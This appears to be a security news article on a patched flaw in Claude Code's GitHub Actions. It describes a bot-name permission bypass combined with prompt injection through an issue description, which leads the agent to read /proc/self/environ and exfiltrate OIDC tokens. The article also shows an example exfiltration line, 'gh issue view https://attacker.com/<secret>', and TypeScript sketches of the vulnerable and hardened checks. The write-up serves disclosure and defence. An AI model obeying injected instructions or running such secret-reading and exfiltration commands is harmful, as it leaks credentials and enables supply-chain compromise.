Security researcher RyotaK from GMO Flatt Security discovered a critical vulnerability in Claude Code’s GitHub Actions that could have allowed any unauthenticated attacker to compromise repositories using Anthropic’s official CI/CD workflow — including Anthropic’s own infrastructure. The flaw: the checkWritePermissions function unconditionally trusted any actor ending in [bot]. Combined with prompt injection, that bypass was enough to steal secrets, exfiltrate OIDC tokens, and push malicious code downstream. Patched in v1.0.94. Bounty: $4,800.
🔍 THE BOTTOM LINE
AI coding tools are becoming part of the software supply chain. When they get a permission model wrong, it’s not just one app — it’s every repo that trusts them. This was a seven-step attack chain from “create a GitHub App” to “push backdoored code to Anthropic’s own repository.”
The Vulnerability
Claude Code’s GitHub Actions restrict workflow execution to users with write or admin access. That’s sensible. But the checkWritePermissions function had a fatal flaw: it unconditionally trusted any actor whose name ended in [bot].
GitHub Apps have implicit read access to public repositories and can create issues or pull requests using only an installation token. So an attacker could:
- Create a malicious GitHub App
- Install it on any attacker-controlled repo (no special permissions needed)
- Use its installation token to open an issue or PR on the target repository
Because the actor appeared as a GitHub App bot, the permission check returned true. The workflow processed the attacker-controlled content. Game over.
What is OIDC in GitHub Actions? OpenID Connect — a protocol GitHub Actions uses to authenticate workflows to cloud providers. If an attacker steals OIDC tokens from a workflow, they can impersonate that workflow and access any cloud resources it’s authorised for.
The Attack Chain
The full exploit required seven steps:
- Create a rogue GitHub App — No special permissions needed
- Install it on an attacker-controlled repo
- Open an issue on the target repo — The bot name bypasses permission checks
- Prompt injection via issue description — A fake error message tricks Claude Code into executing embedded commands
- Read /proc/self/environ — Claude Code allows cat without explicit approval. This Linux pseudo-file exposes all environment variables
- Exfiltrate OIDC tokens — ACTIONS_ID_TOKEN_REQUEST_TOKEN and ACTIONS_ID_TOKEN_REQUEST_URL are among the exposed variables
- Exchange tokens for write access — Use stolen OIDC credentials to obtain a GitHub App token with write access to repo contents, issues, PRs, and workflows
The most alarming part: Anthropic’s own anthropics/claude-code-action repository used a vulnerable agent mode workflow. A successful exploit would have injected malicious code directly into the action’s source, propagating to every downstream repository depending on it — a textbook supply chain attack.
Two Attack Vectors
RyotaK identified two distinct paths to exploitation:
Vector 1: GitHub App bot bypass
- Create a bot-named actor that passes the checkWritePermissions check
- Agent mode lacked the checkHumanActor safeguard that tag mode had
- Open an issue with prompt injection content
- Exfiltrate secrets through Claude’s own issue triage tools
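The check at the heart of Vector 1 is easy to get wrong in exactly the way the article describes. The following is an added illustration, not the claude-code-action source: a constructed reconstruction of the vulnerable pattern (an unconditional shortcut for any login ending in [bot]) beside a hardened version that first applies a checkHumanActor-style gate and then requires a real write or admin grant. The actor names, the permission table, and the use of the event payload's sender type ("User" vs "Bot") are assumptions made for the example.

```typescript
// Added example, not the project's own code. Permission table, actor names and
// the actorType argument (modelled on the GitHub event payload's sender.type)
// are constructed for illustration.

type Permission = "admin" | "write" | "read" | "none";

// Constructed stand-in for a collaborator-permission lookup against the
// repository the workflow runs in.
const collaboratorPermissions: Record<string, Permission> = {
  "maintainer": "admin",
  "contributor": "write",
  "drive-by-user": "read",
};

function lookupPermission(actor: string): Permission {
  return collaboratorPermissions[actor] ?? "none";
}

function hasWriteOrAdmin(actor: string): boolean {
  const perm = lookupPermission(actor);
  return perm === "admin" || perm === "write";
}

// Vulnerable pattern: any actor whose login ends in "[bot]" is trusted before
// its permission on this repository is ever consulted. A GitHub App installed
// on some unrelated repository therefore passes as if it had write access.
function checkWritePermissionsVulnerable(actor: string): boolean {
  if (actor.endsWith("[bot]")) {
    return true;
  }
  return hasWriteOrAdmin(actor);
}

// Hardened pattern, step 1: require a human actor. This is the role the
// article attributes to the checkHumanActor safeguard that tag mode had and
// agent mode lacked. Checking the sender type as well as the login suffix
// means a bot cannot pass simply by choosing a login without "[bot]".
function checkHumanActor(actorType: string, actor: string): boolean {
  return actorType === "User" && !actor.endsWith("[bot]");
}

// Hardened pattern, step 2: only then consult the repository permission.
// Bots fail closed; humans still need write or admin on this repository.
function checkWritePermissionsHardened(actorType: string, actor: string): boolean {
  if (!checkHumanActor(actorType, actor)) {
    return false;
  }
  return hasWriteOrAdmin(actor);
}
```

The difference is the order of the two questions. The vulnerable version asks "is this a bot?" and, if so, stops; the hardened version asks "is this a human?" and, only if so, goes on to ask "does this human have write access here?". Neither version needs to know anything about the GitHub App that created the event.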
Vector 2: Workflow chaining
- Anthropic’s example workflows used allowed_non_write_users: "*"
- Combined with issues: write and id-token: write in a second workflow
- An attacker could use the triage workflow to steal GITHUB_TOKEN via publicly visible workflow run summaries
- Then edit an existing issue to inject prompts into the tag-mode workflow
- Full repository compromise without needing the GitHub App bypass at all
Even the gh issue view command was weaponisable — prompt injection could instruct Claude to embed secrets in URL path arguments (e.g., gh issue view https://attacker.com/<secret>), sending credentials to an external server.
The Fix
Anthropic patched the vulnerability in Claude Code GitHub Actions v1.0.94. The fixes include:
- Added checkHumanActor call to agent mode — closing the bot bypass
- Disabled workflow run summary section by default — preventing token exfiltration through visible logs
- Scrubbed environment variables from child processes — /proc/self/environ no longer leaks secrets
- Custom gh command wrapper — validates arguments and blocks exfiltration-capable URL patterns
- Post-trigger edit protection — ignores issues and comments edited after a workflow is triggered, closing the workflow-chaining attack
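Three of the fixes listed above are small pieces of defensive logic that are worth seeing concretely. The block below is an added example written for this article, not Anthropic's patch: constructed illustrations of environment scrubbing for child processes, argument validation for gh issue view, and post-trigger edit protection. The variable allow-list, the decision to accept only issue numbers (gh itself also accepts URLs, which the wrapper deliberately refuses), and all sample inputs are assumptions.

```typescript
// Added example, not the project's patch. Key list, accepted flags and
// sample values are constructed for illustration.

// 1. Environment scrubbing. The article names ACTIONS_ID_TOKEN_REQUEST_TOKEN
//    and ACTIONS_ID_TOKEN_REQUEST_URL as exposed through /proc/self/environ;
//    GITHUB_TOKEN is added here as an assumption. Build the env handed to a
//    child process without them so reading the child's environ yields nothing.
const SECRET_ENV_KEYS: ReadonlySet<string> = new Set([
  "ACTIONS_ID_TOKEN_REQUEST_TOKEN",
  "ACTIONS_ID_TOKEN_REQUEST_URL",
  "GITHUB_TOKEN",
]);

function scrubEnv(env: Record<string, string>): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [key, value] of Object.entries(env)) {
    if (!SECRET_ENV_KEYS.has(key)) {
      out[key] = value;
    }
  }
  return out;
}

// 2. gh argument validation. The wrapper allows `gh issue view <number>`,
//    optionally with `--repo OWNER/NAME` (or `-R`) and `--comments`. Anything
//    else, including any URL-shaped value, is rejected, so a prompt-injected
//    argument cannot carry secrets to an external host in a URL path.
const ISSUE_NUMBER = /^\d+$/;
const REPO_SLUG = /^[A-Za-z0-9_.-]+\/[A-Za-z0-9_.-]+$/;

function validateGhIssueView(args: string[]): boolean {
  if (args.length === 0 || !ISSUE_NUMBER.test(args[0])) {
    return false;
  }
  for (let i = 1; i < args.length; i++) {
    const arg = args[i];
    if (arg === "--repo" || arg === "-R") {
      const slug = args[++i];
      if (slug === undefined || !REPO_SLUG.test(slug)) {
        return false;
      }
    } else if (arg === "--comments") {
      continue;
    } else {
      // Unknown flag or free-form value: fail closed.
      return false;
    }
  }
  return true;
}

// 3. Post-trigger edit protection. If the issue or comment was modified after
//    the workflow was triggered, its body is not used at all, so an issue
//    cannot be rewritten mid-run to inject prompts into a later step.
interface IssueLike {
  body: string;
  updated_at: string; // ISO 8601 timestamp, as in the GitHub API
}

function contentForRun(item: IssueLike, triggeredAt: string): string | null {
  const edited = Date.parse(item.updated_at);
  const triggered = Date.parse(triggeredAt);
  if (Number.isNaN(edited) || Number.isNaN(triggered) || edited > triggered) {
    return null;
  }
  return item.body;
}
```

All three share the same shape: decide what the trusted set is (variables a child may see, argument forms gh may receive, content versions that existed at trigger time) and refuse everything outside it, rather than trying to enumerate the dangerous cases.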
CVSS v4.0 score: 7.8 (high severity). Anthropic awarded $3,800 plus a $1,000 bonus through its bug bounty program.
The Bigger Problem
This vulnerability illustrates a systemic issue with AI coding tools entering the supply chain. When Claude Code runs in GitHub Actions, it’s not just an assistant — it’s an actor with access to secrets, tokens, and write permissions. A permission model that trusts bots unconditionally, combined with prompt injection, creates a path from “anyone on the internet” to “full repository compromise.”
The attack surface is real and growing:
- AI coding tools are embedded in CI/CD pipelines across millions of repos
- Prompt injection is a well-understood but still-unpatchable class of vulnerability for LLMs
- Supply chain attacks amplify a single compromise across all downstream dependencies
This isn’t just an Anthropic problem. Any AI tool with GitHub Actions integration, write permissions, and LLM-driven command execution has a similar attack surface. The question isn’t whether more of these vulnerabilities exist — it’s how quickly they’ll be found.
❓ Frequently Asked Questions
Q: Am I affected?
If you use Claude Code GitHub Actions, check your version. v1.0.94 or later is patched. Anything earlier is vulnerable. Also audit any workflow using allowed_non_write_users: "*" — that configuration is inherently risky.
Q: Was this exploited in the wild?
No. RyotaK reported the vulnerability responsibly and Anthropic patched it before any known exploitation. The attack was demonstrated in a proof-of-concept, not real-world attacks.
Q: Is this an AI problem or a security design problem?
Both. The permission model flaw (trusting [bot] actors) is a traditional security bug. But prompt injection — tricking an AI into executing commands it shouldn’t — is an AI-specific vulnerability class. The combination makes AI-powered CI/CD tools particularly dangerous.
🔍 THE BOTTOM LINE
One bot name check. One missing checkHumanActor call. One cat /proc/self/environ. That’s all it took to go from “anyone on the internet” to “compromise Anthropic’s own infrastructure and every repo downstream.” Patched, yes. But the pattern — AI tools with excessive permissions in CI/CD pipelines — is everywhere. This won’t be the last one.